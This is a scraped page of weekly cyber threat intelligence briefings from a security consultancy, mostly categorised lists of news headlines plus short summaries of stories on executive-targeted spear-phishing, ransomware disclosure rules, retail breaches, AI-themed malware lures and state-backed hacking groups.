CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership
CISO 3.0: Leading AI governance and security in the boardroom - Help Net Security
CISO Stature Rises, but Budgets Remain Tight
UK SMBs are ramping up cyber security spending – and it’s about time | IT Pro
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
Building a Cyber-Resilient Organisation CISOs Roadmap
Is Your CISO Navigating Your Flight Path?
What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget
Breaking Down Silos Aligning IT and Security Teams
Cyber security top investment priority with tech leaders
Are you cyber resilient? Five traits that define the leaders of 2025 | SC Media
Preparing for AI: The CISO’s role in security, ethics and compliance | Computer Weekly
Creating the right organisational culture for cyber security - NCSC.GOV.UK
6 hard truths security pros must learn to live with | CSO Online
Why hacking yourself first is essential for proactive cyber security | TechRadar
From Reactive to Resilient: Achieving Compliance and Driving ROI Through Threat... | SC Media UK
What Is Cyber Threat Intelligence: Quick Guide For CISOs
Cyber and digital get over £1bn to enhance UK’s national security | Computer Weekly
53% of cyber department leaders eyeing the exit | CSO Online
Cyber Security Needs Satellite Navigation, Not Paper Maps - Security Boulevard
Threats
Ransomware, Extortion and Destructive Attacks
FBI: Play ransomware breached 900 victims, including critical orgs
Mandatory Ransomware Payment Disclosure Begins in Australia - Infosecurity Magazine
Do-It-Yourself Cyber Attack Tools Are Booming - WSJ
6 rising malware trends every security pro should know | CSO Online
Scattered Spider: Three things the news doesn’t tell you
Play ransomware groups use SimpleHelp flaw: FBI • The Register
Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
Mysterious leaker outs Conti ransomware kingpins • The Register
Interlock ransomware: what you need to know | Tripwire
Cops in Germany Claim They’ve ID’d the Mysterious Trickbot Ransomware Kingpin | WIRED
New ChatGPT Scam Infects Users With Ransomware: ‘Exercise Extreme Caution’
When ransomware listings create confusion as to who the victim was – DataBreaches.Net
Cyber attacks: What do hackers do with your data?
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek
ViLE gang members sentenced for DEA portal breach, extortion
Space assets could be held ransom. Will we have any choice but to pay? - SpaceNews
Ransomware and USB attacks are hammering OT systems - Help Net Security
Ransomware Victims
FBI: Play ransomware breached 900 victims, including critical orgs
Two thirds of UK consumers are changing online shopping habits due to recent retail cyber attacks
M&S hackers sent abuse and ransom demand directly to CEO - BBC News
Volkswagen investigates hacker data breach claims | Cybernews
Victoria's Secret Says It Will Postpone Earnings Report After Recent Security Breach - SecurityWeek
Interlock ransomware claims Kettering Health breach, leaks stolen data
A cyber attack hit hospitals operated by Covenant Health
Next beefs up customer security amid retail hacking crisis - UKTN
Phishing & Email Based Attacks
Do-It-Yourself Cyber Attack Tools Are Booming - WSJ
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
Crims breached 100k UK tax accounts to steal £43M from HMRC • The Register
Phishing Campaign Uses Fake Booking.com Emails to Deliver Malware - Infosecurity Magazine
VEC Attacks Outpace BEC in EMEA: A Growing Challenge for MSSPs | MSSP Alert
Cyber attacks: What do hackers do with your data?
Fred Hutch to pay $50M+ in 2023 data raid settlement • The Register
Beware of Device Code Phishing
Where Did The Name 'Phishing' Come From?
Business Email Compromise (BEC)/Email Account Compromise (EAC)
VEC Attacks Outpace BEC in EMEA: A Growing Challenge for MSSPs | MSSP Alert
Other Social Engineering
Beware of Device Code Phishing
North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ
Thwart nation-state threat actors with these CISO tips | TechTarget
Vishing Crew Targets Salesforce Data
ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware - SecurityWeek
Fraud, Scams and Financial Crime
Crims breached 100k UK tax accounts to steal £43M from HMRC • The Register
FBI Warns of Filipino Tech Company Running Crypto Scams
Why Scamming Can't Be Stopped—But It Can Be Managed - SecurityWeek
Law enforcement seized the carding marketplace BidenCash
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop
Google survey shows Americans are changing how they fight scams - Help Net Security
Scammer Reported To FBI & Cyber Crime Agency After Conning TV Writers
Airbnb scams: new book explores thriving criminal activity on big tech platforms
Artificial Intelligence
Vibe coding is here to stay. Can it ever be secure? | CyberScoop
CISOs beware: genAI use is outpacing security controls | CSO Online
Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware
Preparing for AI: The CISO’s role in security, ethics and compliance | Computer Weekly
The hidden security risks of open source AI | Computer Weekly
AI Emerges as the Top Concern for Security Leaders | Security Magazine
Combatting the Threat of AI Misuse | SC Media UK
The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare | WIRED
96% of IT pros say AI agents are a security risk, but they're deploying them anyway | ZDNET
Companies Are Discovering a Grim Problem With "Vibe Coding"
The security debt of browsing AI agents | TechRadar
Researchers Bypass Deepfake Detection With Replay Attacks
AI agents make great teammates, but don't let them code alone - here's why | ZDNET
2FA/MFA
Malware
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
6 rising malware trends every security pro should know | CSO Online
Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware
Sophisticated Malware Campaign Targets Windows and Linux Systems - Infosecurity Magazine
Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack
New versions of Chaos RAT target Windows and Linux systems
FBI: BADBOX 2.0 Android malware infects millions of consumer devices
ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware - SecurityWeek
Backdoored Open Source Malware Repositories Target Novice Cyber Criminals - SecurityWeek
US offers $10M for tips on state hackers tied to RedLine malware
Threat Actors Exploiting DevOps Web Servers Misconfigurations To Deploy Malware
Hacker targets other hackers and gamers with backdoored GitHub code
Mobile
Android banking trojan Crocodilus rapidly evolves and goes global
FBI Wants Access To Encrypted iPhone And Android Data—So Does Europe
Google addresses 34 high-severity vulnerabilities in June’s Android security update | CyberScoop
Android malware trends: Stealthier, easier-to-use | Intel 471
Beware of Device Code Phishing
Denial of Service/DoS/DDoS
Major DDoS attack disrupts Moscow’s internet services | SC Media
Internet of Things – IoT
FBI: BADBOX 2.0 Android malware infects millions of consumer devices
Your Amazon light bulb cameras are secretly beaming footage to Chinese servers without consent
Data Breaches/Leaks
ConnectWise Breached, ScreenConnect Customers Targeted
Fred Hutch to pay $50M+ in 2023 data raid settlement • The Register
Volkswagen investigates hacker data breach claims | Cybernews
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek
ViLE gang members sentenced for DEA portal breach, extortion
Cartier discloses data breach amid fashion brand cyber attacks
The North Face warns customers of April credential stuffing attack
Hackers Leak 86 Million AT&T Records with Decrypted SSNs
Organised Crime & Criminal Actors
Do-It-Yourself Cyber Attack Tools Are Booming - WSJ
Why teenage hackers pose more danger than ever
Websites selling hacking tools to cyber criminals seized – DataBreaches.Net
US DoJ Seizes 4 Domains Supporting Cyber Crime Crypting Services in Global Operation
How global collaboration is hitting cyber criminals where it hurts - Help Net Security
Infosecurity 2025: NCA cyber intelligence head spells out trends | Computer Weekly
Cyber attacks: What do hackers do with your data?
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
FBI Warns of Filipino Tech Company Running Crypto Scams
Hacker arrested for breaching 5,000 hosting accounts to mine crypto
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop
BitMEX discovers cyber security lapses in North Korea hacker group
The US government is now a bitcoin whale. That has consequences | American Banker
Insider Risk and Insider Threats
North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ
FBI arrests DoD IT worker, claim he tried to leak intel • The Register
Thwart nation-state threat actors with these CISO tips | TechTarget
Insurance
Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
Companies Looking to Cyber Liability Insurance
Supply Chain and Third Parties
ConnectWise Breached, ScreenConnect Customers Targeted
Play ransomware groups use SimpleHelp flaw: FBI • The Register
What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget
Half of Firms Suffer Two Supply Chain Incidents in Past Year - Infosecurity Magazine
Outages
SentinelOne: Last week’s 7-hour outage caused by software flaw
Identity and Access Management
Don’t let dormant accounts become a doorway for cyber criminals
Encryption
FBI Wants Access To Encrypted iPhone And Android Data—So Does Europe
MITRE Publishes Post-Quantum Cryptography Migration Roadmap - SecurityWeek
Inside The Coming Quantum Crisis: Why CEOs Must Prepare For Q-Day Now
The EU’s “Encryption Roadmap” Makes Everyone Less Safe | Electronic Frontier Foundation
Linux and Open Source
Sophisticated Malware Campaign Targets Windows and Linux Systems - Infosecurity Magazine
New versions of Chaos RAT target Windows and Linux systems
New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora
Passwords, Credential Stuffing & Brute Force Attacks
New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora
Account Lockout Policy: Setup and Best Practices Explained | TechTarget
Don’t let dormant accounts become a doorway for cyber criminals
Social Media
Meta is now a defence contractor • The Register
Training, Education and Awareness
Building a Scalable Cyber Security Training Program
Regulations, Fines and Legislation
Mandatory Ransomware Payment Disclosure Begins in Australia - Infosecurity Magazine
The UK’s New Cyber Security Bill: A Call to Action for Tech Businesses - Infosecurity Magazine
Vodafone Germany Fined $51 Million Over Privacy, Security Failures - SecurityWeek
Data watchdog put cops on naughty step for lost CCTV footage • The Register
US Banks Seek to Limit Cyber Attack Disclosures
Trump budget proposal would slash more than 1,000 CISA jobs | CyberScoop
Slashing CISA Is a Gift to Our Adversaries
The EU’s “Encryption Roadmap” Makes Everyone Less Safe | Electronic Frontier Foundation
Trump's Cyber Pick Vows Interagency Cooperation if Confirmed
Senator hounds Trump’s cyber pick over CISA cuts • The Register
Models, Frameworks and Standards
The UK’s New Cyber Security Bill: A Call to Action for Tech Businesses - Infosecurity Magazine
MITRE Publishes Post-Quantum Cryptography Migration Roadmap - SecurityWeek
Data Protection
Data watchdog put cops on naughty step for lost CCTV footage • The Register
Careers, Working in Cyber and Information Security
CIOs get serious about closing the skills gap — mainly from within | CIO
PTSD Resolution and CIISec to offer therapy to cyber workers
53% of cyber department leaders eyeing the exit | CSO Online
Law Enforcement Action and Take Downs
Hacker arrested for breaching 5,000 hosting accounts to mine crypto
Websites selling hacking tools to cyber criminals seized – DataBreaches.Net
US DoJ Seizes 4 Domains Supporting Cyber Crime Crypting Services in Global Operation
How global collaboration is hitting cyber criminals where it hurts - Help Net Security
Infosecurity 2025: NCA cyber intelligence head spells out trends | Computer Weekly
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek
ViLE gang members sentenced for DEA portal breach, extortion
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
UK CyberEM Command to spearhead new era of armed conflict • The Register
The UK Brings Cyberwarfare Out of the Closet - SecurityWeek
Nation State Actors
Microsoft, CrowdStrike Lead Effort to Map Threat Actor Names - SecurityWeek
Will Massive Security Glossary From Microsoft, Google, CrowdStrike, Palo Alto Improve Collaboration?
China
China accuses Taiwan and the US of being feeble hackers • The Register
Your Amazon light bulb cameras are secretly beaming footage to Chinese servers without consent
Russia
Damascened Peacock: Russian hackers targeted UK Ministry of Defence
Russian hybrid warfare: Ukraine's success offers lessons for Europe - Atlantic Council
Ukraine's enduring cyber defence: Assessing resilience and impact of shifting international support
US offers $10M for tips on state hackers tied to RedLine malware
Russian hackers target Greek company | Ukrainska Pravda
Ukraine takes second strike at Russians with Tupolev hack • The Register
Major DDoS attack disrupts Moscow’s internet services | SC Media
Moscow Poses No Threat to Britain, Says Russia's UK Embassy
Iran
Iranian APT 'BladedFeline' Hides in Network for 8 Years
North Korea
North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop
BitMEX discovers cyber security lapses in North Korea hacker group
Tools and Controls
What Is Cyber Threat Intelligence: Quick Guide For CISOs
Vibe coding is here to stay. Can it ever be secure? | CyberScoop
Companies Are Discovering a Grim Problem With "Vibe Coding"
From Reactive to Resilient: Achieving Compliance and Driving ROI Through Threat... | SC Media UK
Bitdefender report finds 84% of major attacks now involve legitimate tools - SiliconANGLE
Role of Threat Intelligence in Proactive Defence Strategies
Microsoft, CrowdStrike Lead Effort to Map Threat Actor Names - SecurityWeek
Will Massive Security Glossary From Microsoft, Google, CrowdStrike, Palo Alto Improve Collaboration?
Play ransomware groups use SimpleHelp flaw: FBI • The Register
What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget
The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare | WIRED
AI agents make great teammates, but don't let them code alone - here's why | ZDNET
CISO Stature Rises, but Budgets Remain Tight
Building a Cyber-Resilient Organisation CISOs Roadmap
Cyber security top investment priority with tech leaders
Why hacking yourself first is essential for proactive cyber security | TechRadar
Beyond the Broken Wall: Why the Security Perimeter Is Not Enough
A comprehensive new guide to today’s hazards | UNDRR
CISOs need better tools to turn risk into action - Help Net Security
Account Lockout Policy: Setup and Best Practices Explained | TechTarget
Don’t let dormant accounts become a doorway for cyber criminals
96% of IT pros say AI agents are a security risk, but they're deploying them anyway | ZDNET
Why Scamming Can't Be Stopped—But It Can Be Managed - SecurityWeek
48% of security pros are falling behind compliance requirements - Help Net Security
Threat Actors Exploiting DevOps Web Servers Misconfigurations To Deploy Malware
Researchers Bypass Deepfake Detection With Replay Attacks
Agentic AI and the risks of unpredictable autonomy - Help Net Security
DNS Hijacking, A Major Cyber Threat for the UK Government - Infosecurity Magazine
Other News
A comprehensive new guide to today’s hazards | UNDRR
Bitdefender report finds 84% of major attacks now involve legitimate tools - SiliconANGLE
Two thirds of UK consumers are changing online shopping habits due to recent retail cyber attacks
Cyber and digital get over £1bn to enhance UK’s national security | Computer Weekly
UK Defence Review: “Making Britain safer/secure at home, and strong abroad” - EDR Magazine
New spying claims emerge in Silicon Valley corporate espionage scandal
Danish energy sector probe removes concerns about solar involvement – pv magazine International
Cyber Security Needs Satellite Navigation, Not Paper Maps - Security Boulevard
Space assets could be held ransom. Will we have any choice but to pay? - SpaceNews
CISOs Guide to Navigating the 2025 Threat Landscape
The Secret Defence Strategy of Four Critical Industries Combating Advanced Cyber Threats
Vulnerability Management
Filling the Gap with the European Vulnerability Database
Future-ready cyber security: Lessons from the MITRE CVE crisis | CyberScoop
Trump budget proposal would slash more than 1,000 CISA jobs | CyberScoop
Slashing CISA Is a Gift to Our Adversaries
Seven Steps to Building a Mature Vulnerability Management Program - Infosecurity Magazine
Vulnerabilities
Technical Details Published for Critical Cisco IOS XE Vulnerability - SecurityWeek
Two Linux flaws can lead to the disclosure of sensitive data
SentinelOne: Last week’s 7-hour outage caused by software flaw
Google addresses 34 high-severity vulnerabilities in June’s Android security update | CyberScoop
New Chrome Zero-Day Actively Exploited; Google Issues Emergency Out-of-Band Patch
Microsoft ships emergency patch to fix Windows 11 startup failures
Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users to Run Malicious Code
Critical Cisco ISE Auth Bypass Flaw Impacts Cloud Deployments on AWS, Azure, and OCI
Questions Swirl Around ConnectWise Flaw Used in Attacks
Hackers are exploiting critical flaw in vBulletin forum software
Qualcomm Fixes 3 Zero-Days Used in Targeted Android Attacks via Adreno GPU
vBulletin Vulnerability Exploited in the Wild - SecurityWeek
HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass
Why SAP security updates are a struggle for large enterprises - Help Net Security
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 30 May 2025:
-New Spear-Phishing Attack Targeting Financial Executives by Deploying Malware
-The Hidden Cyber Risks in Your Executive Team’s Digital Footprint
-Mandatory Ransomware Payment Disclosure Begins in Australia
-Cyber is Now the Top Reputational Risk for Global Firms for 2024/25 per WTW
-Cyber Security Teams Generate Average of $36M in Business Growth
-M&S Boss: I Went into Shock over Cyber Attack
-Cyber Criminals Exploit AI Hype to Spread Ransomware, Malware
-AI Is Perfecting Scam Emails, Making Phishing Hard to Catch
-4.5% of Breaches Now Extend to Fourth Parties
-Any Teenager Can Be a Cyber Attacker Now, Parents Warned
-New Russian State Hacking Group Hits Europe and North America
-DragonForce Engages in "Turf War" for Ransomware Dominance
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round up of the most notable threats, vulnerabilities and cyber related news from the last week.
Executive Summary
This week’s review highlights the growing risks facing senior executives, with threat actors increasingly targeting C-suite leaders through tailored spear-phishing campaigns and exploiting their digital footprints. A recent study reports cyber risk as the top reputational concern for senior leaders globally, yet most organisations remain unprepared to model the business impact of such events, while the CEO of M&S highlights the personal effects of experiencing a cyber attack. By contrast, we report on a study that has assessed the business value of including cyber security at the outset of business initiatives.
We also report on the evolution of attack tactics, including disguising ransomware and malware as legitimate AI tools, and enabling teenagers with limited technical skills to conduct attacks. The cyber threat landscape remains volatile, with criminal groups exploiting AI hype, expanding supply chain attack vectors, and even competing for dominance amongst their peers.
Finally, Australia now requires companies to report ransomware payments, which we see as part of a growing drive for transparency that builds on current and forthcoming legislation in other jurisdictions.
Black Arrow recommends that business leaders should ensure they perform an objective assessment of their cyber risks, and address those risks through controls across people, operations and technology aligned to a respected framework underpinned by robust governance.
Top Cyber Stories of the Last Week
New Spear-Phishing Attack Targeting Financial Executives by Deploying Malware
A new spear-phishing (highly targeted/individualised phishing) campaign is actively targeting chief financial officers and senior executives in the banking, energy, insurance, and investment sectors across multiple regions, including the UK. The operation impersonates recruitment outreach from a well-known financial firm and uses convincing social engineering to bypass standard security training. The attackers deploy a legitimate remote access tool, blending into normal network activity and complicating detection. The use of custom CAPTCHA and hidden download mechanisms highlights the operation’s sophistication. The campaign’s precise targeting and persistence tactics reflect a well-resourced threat actor likely pursuing long-term strategic access.
https://cybersecuritynews.com/new-spear-phishing-attack-targeting-financial-executives/
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint
Executives and board members are increasingly targeted by cyber criminals due to their extensive digital footprints and access to high-value systems. Public profiles, reused passwords, and personal device use create opportunities for attackers to launch tailored phishing, impersonation, and deepfake scams. Infostealers harvesting login details and cookies from executive endpoints are now sold on dark web markets, sometimes with corporate credentials priced as low as $100. These risks go beyond technical flaws, exposing organisations to reputational and operational damage. Proactive monitoring of executive identities and digital exposure is now critical to reducing breach likelihood and maintaining cyber resilience.
Mandatory Ransomware Payment Disclosure Begins in Australia
Australia has become the first country to mandate the reporting of ransomware payments, requiring private organisations with turnover above AUD $3m to notify authorities within 72 hours of making or learning of a payment. The new measures aim to improve visibility into cyber crime and reduce underreporting, with research showing only one in five victims currently alert authorities. The law also introduces a Cyber Incident Review Board and forthcoming smart device security standards. With global momentum growing, the UK is now consulting on similar ransomware reporting and payment restrictions for critical infrastructure and public sector entities.
https://www.infosecurity-magazine.com/news/ransomware-payment-disclosure/
Cyber is Now the Top Reputational Risk for Global Firms for 2024/25 per WTW
WTW’s latest global survey has found that cyber risk is now the top reputational concern for senior executives, cited by 65% of respondents, up from 52% last year. Environmental and governance risks also rose significantly, reflecting growing regulatory pressures. While 94% of organisations now reserve budgets for managing reputational damage, only 11% feel confident in modelling the financial impact of such events. Encouragingly, most firms have formal crisis response teams and conduct regular scenario testing, but the gap between preparedness and risk quantification remains a key challenge for leadership to address in today’s volatile threat landscape.
Cyber Security Teams Generate Average of $36M in Business Growth
An EY global study has found that cyber security teams contribute a median of $36 million in business value per enterprise initiative, yet budget allocations have halved as a percentage of revenue over the past two years. Despite their growing strategic role, only 13% of CISOs are engaged early in key business decisions. The report highlights that when involved from the outset, security leaders accelerate innovation, reduce risk, and strengthen customer trust, particularly in AI adoption and market expansion. Organisations recognising this are seeing both enhanced resilience and competitive advantage through secure, business-aligned transformation.
https://www.infosecurity-magazine.com/news/cybersecurity-teams-business-growth/
M&S Boss: I Went into Shock over Cyber Attack
The chief executive of UK retailer Marks & Spencer (M&S) described feeling “in shock” as the company faced a ransomware cyber attack that disrupted payments, digital stock systems and online sales, with losses estimated at £300 million. The incident exposed personal data belonging to staff and millions of customers, prompting warnings about scams and reinforcing the reputational impact. The attack, attributed to human error, highlighted the persistent difficulty in defending against ransomware. The crisis has accelerated M&S’ digital infrastructure overhaul, reducing a planned three-year transformation to just 18 months.
https://www.telegraph.co.uk/business/2025/05/25/ms-boss-i-went-into-shock-over-cyber-attack/
Cyber Criminals Exploit AI Hype to Spread Ransomware, Malware
Cyber criminals are increasingly exploiting public interest in artificial intelligence by disguising ransomware and malware as legitimate AI tools. Recent campaigns have used fake websites and malicious installers claiming to offer free AI services to lure users into downloading harmful software. Victims are targeted through manipulated search engine results and deceptive advertisements. Once installed, these payloads can encrypt data, corrupt systems, or render devices inoperable. Notably, attackers are blending legitimate AI components with malware to evade detection. Organisations are advised to source AI tools only from verified providers and avoid downloading from promoted links or unofficial platforms.
AI Is Perfecting Scam Emails, Making Phishing Hard to Catch
AI-driven tools are transforming phishing scams, making fraudulent emails far harder to detect. Unlike earlier scams with poor grammar and awkward phrasing, messages now appear polished and convincingly mimic trusted brands and individuals, even in niche languages like Icelandic. The FBI estimates email and impersonation frauds generated $16.6 billion last year. Attackers can now rapidly customise scams at scale, embedding into real threads and exploiting lookalike domains. Experts warn traditional awareness training is no longer enough; verifying suspicious messages and using measures like multifactor authentication and password managers are increasingly essential for defence.
https://www.axios.com/2025/05/27/chatgpt-phishing-emails-scam-fraud
4.5% of Breaches Now Extend to Fourth Parties
There has been a sharp rise in supply chain risks, with over a third (35%) of breaches in 2024 linked to third parties, up 6.5% from last year, and 4.5% now involving fourth parties. Nearly half of these third-party breaches stemmed from technology services, though attack surfaces are diversifying. Ransomware operations are increasingly exploiting supply chains, with 41% of attacks originating via third-party vectors. Subsidiaries and acquisitions now account for nearly 12% of third-party breaches, exposing internal blind spots. The findings underscore the urgent need for continuous, real-time monitoring of vendor ecosystems, as traditional periodic assessments are no longer sufficient.
https://www.helpnetsecurity.com/2025/05/27/third-party-breaches-increase/
Any Teenager Can Be a Cyber Attacker Now, Parents Warned
A shift has been observed in the cyber crime landscape, with younger, less technically skilled individuals now able to participate in serious offences using widely available online tools. Hacking communities such as “the Com” have evolved into organised groups engaging in ransomware, fraud and extortion, with some members living extravagantly on stolen cryptocurrency. The recent cyber attack on UK retailer M&S, linked to this network, could cost the retailer up to £300 million. Authorities warn that parents and organisations alike must be more alert, as cyber crime becomes more accessible, socially driven and increasingly blurred with real-world violence and intimidation.
New Russian State Hacking Group Hits Europe and North America
Microsoft has identified a newly active Russian state-affiliated group, called Void Blizzard or Laundry Bear, targeting government bodies and critical industries across Europe and North America. The group has compromised multiple organisations, including Ukrainian aviation and Dutch police entities, with tactics ranging from password spraying to spear phishing using spoofed authentication pages. Recent campaigns targeted over 20 NGOs with malicious QR codes to harvest credentials. Post-compromise activity includes automated data theft from cloud platforms and access to Microsoft Teams. Intelligence agencies warn that the group is seeking sensitive defence-related information, particularly linked to NATO, EU member states and military support for Ukraine.
https://www.infosecurity-magazine.com/news/russian-state-group-europe-america/
DragonForce Engages in "Turf War" for Ransomware Dominance
Sophos has revealed that the ransomware group DragonForce is engaged in a power struggle with rivals in a bid to dominate the cyber crime landscape. Following a rebrand into a ‘cartel’ model and launch of its white-label ransomware platform, DragonForce has targeted competitors and appears responsible for the sudden outage of a rival group’s infrastructure in March. This internal warfare has disrupted some operations but has not reduced the threat to organisations. Instead, researchers warn it may lead to more unpredictable and opportunistic cyber attacks, requiring businesses to strengthen incident response and threat monitoring capabilities.
https://www.infosecurity-magazine.com/news/dragonforce-turf-war-ransomware/
Governance, Risk and Compliance
Cyber now the top reputational risk for global firms, WTW report finds | Global Reinsurance
Welcome to the age of cyber insecurity in business
M&S boss: I went into shock over cyber attack
Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge
4.5% of breaches now extend to fourth parties - Help Net Security
When leaders ignore cyber security rules, the whole system weakens | Computer Weekly
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Cyber Security Teams Generate Average of $36M in Business Growth - Infosecurity Magazine
Why Cyber Security Is Shifting From Detection To Performance
Threats
Ransomware, Extortion and Destructive Attacks
DragonForce used MSP's RMM software to distribute ransomware • The Register
DragonForce Engages in "Turf War" for Ransomware Dominance - Infosecurity Magazine
Police Probe Hacking Gang Over Retail Attacks | Silicon UK Tech
Cyber criminals exploit AI hype to spread ransomware, malware
Any teenager can be a cyber attacker now, parents warned
In cyber attacks, humans can be the weakest link
Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert
How CISOs can defend against Scattered Spider ransomware attacks | CSO Online
Silent Ransom Group targeting law firms, the FBI warns
FBI warns of Luna Moth extortion attacks targeting law firms
UK, US Police Target Ransomware Gangs In Latest Action | Silicon
Sophos warns MSPs over DragonForce threat | Microscope
'Everest Group' Extorts Global Orgs via SAP's HR Tool
'Kisses from Prague': The fall of a Russian ransomware giant
The rise and rise of ransomware - Chris Skinner's blog
Ransomware Victims
Police Probe Hacking Gang Over Retail Attacks | Silicon UK Tech
M&S boss: I went into shock over cyber attack
In cyber attacks, humans can be the weakest link
Retail attacks put cyber security in the spotlight | ICAEW
Silent Ransom Group targeting law firms, the FBI warns
FBI warns of Luna Moth extortion attacks targeting law firms
Hackers just hit a $5B hospital empire, demand ransom | Cybernews
Nova Scotia Power Confirms Ransomware Attack, 280k Notified of Data Breach - SecurityWeek
Luxury jet company allegedly faces data breach | Cybernews
Nova Scotia Power confirms it was hit by ransomware
The rise and rise of ransomware - Chris Skinner's blog
Victoria’s Secret Website Taken Offline After Cyber Attack - SecurityWeek
Phishing & Email Based Attacks
How to spot phishing emails now that AI has cleaned up the typos
New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware
'Haozi' Gang Sells Turnkey Phishing Tools to Amateurs
Less than eight percent of top domains implement the toughest DMARC protection
Threat actors abuse Google Apps Script in evasive phishing attacks
Threat Actors Impersonate Fake Docusign Notifications To Steal Corporate Data
Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth's Stealth Phishing Campaign
The rise of AI-driven phishing attacks: A growing threat and the power of smarter defences | Ctech
New Browser Exploit Technique Undermines Phishing Detection - Infosecurity Magazine
New Russian cyber-spy crew Laundry Bear joins the pack • The Register
What to do if your Facebook account has been phished, hacked, stolen
Gone phishing: the rise of retail cyber crime in four charts
‘Secure email’: A losing battle CISOs must give up | CSO Online
Other Social Engineering
In cyber attacks, humans can be the weakest link
Cyber criminals exploit AI hype to spread ransomware, malware
Oversharing online? 5 ways it makes you an easy target for cyber criminals | ZDNET
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Can You Identify a Scam Link? Don't Worry, We'll Teach You How - CNET
How well do you know your remote IT worker? - Help Net Security
Employees Searching Payroll Portals on Google Tricked Into Sending Paychecks to Hackers
Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth's Stealth Phishing Campaign
WSJ: US probes fake White House staff plot | Cybernews
Late night cyber attack targets Israelis with fake hostage calls
Fraud, Scams and Financial Crime
Crypto Drainers are Targeting Cryptocurrency Users - Security Boulevard
Can You Identify a Scam Link? Don't Worry, We'll Teach You How - CNET
Digital trust is cracking under the pressure of deepfakes, cyber crime - Help Net Security
Grandpa-conning crook jailed over sugar-coated drug scam • The Register
Public urged to create secret passwords with family and friends to avoid AI-generated scams
Apple Blocks $9 Billion in Fraud Over 5 Years Amid Rising App Store Threats
Employees Searching Payroll Portals on Google Tricked Into Sending Paychecks to Hackers
How CISOs can regain ground in the AI fraud war - Help Net Security
US sanctions firm linked to cyber scams behind $200 million in losses
Artificial Intelligence
How to spot phishing emails now that AI has cleaned up the typos
Cyber criminals exploit AI hype to spread ransomware, malware
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert
Digital trust is cracking under the pressure of deepfakes, cyber crime - Help Net Security
Cyber criminals Take Advantage of ChatGPT and Other Generative AI Models | Security Magazine
TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar
How well do you know your remote IT worker? - Help Net Security
Public urged to create secret passwords with family and friends to avoid AI-generated scams
How CISOs can regain ground in the AI fraud war - Help Net Security
Rethinking Data Privacy in the Age of Generative AI
AI forces security leaders to rethink hybrid cloud strategies - Help Net Security
The rise of AI-driven phishing attacks: A growing threat and the power of smarter defences | Ctech
Most AI chatbots devour your user data - these are the worst offenders | ZDNET
Malware
Cyber criminals exploit AI hype to spread ransomware, malware
New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware
SilverRAT Source Code Leaked Online: Here’s What You Need to Know
TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar
Fake Zenmap, WinMRT sites target IT staff with Bumblebee malware
Hackers Use Fake VPN and Browser NSIS Installers to Deliver Winos 4.0 Malware
